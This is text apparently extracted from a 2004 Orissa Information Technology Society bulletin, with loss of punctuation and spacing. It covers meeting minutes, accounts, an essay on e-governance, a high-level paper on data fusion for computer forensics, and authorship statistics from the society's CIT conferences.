Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

